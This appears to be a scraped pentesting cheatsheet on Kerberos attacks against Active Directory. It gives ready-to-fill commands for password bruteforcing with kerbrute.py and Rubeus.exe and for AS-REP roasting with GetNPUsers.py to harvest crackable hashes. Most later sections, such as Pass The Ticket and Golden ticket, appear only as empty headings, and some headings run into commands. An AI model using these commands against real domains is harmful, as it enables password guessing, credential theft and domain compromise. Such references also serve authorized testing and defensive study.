Kerberos Attack Cheatsheet
Kerberos Attack Cheatsheet
Bruteforcing
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file># with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>
# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>ASREPRoast
# check ASREPRoast for all domain users (credentials required)
python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
# check ASREPRoast for a list of users (no credentials required)
python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>Kerberoasting
Overpass The Hash/Pass The Key (PTK)
Pass The Ticket (PTT)
Harvest tickets from Linux
Harvest tickets from Windows
Using ticket in Linux
Using ticket in Windows
Silver ticket
Golden ticket
Misc
Setting Flag For Unconstrained Delegation User
Tools
Risorse
Last updated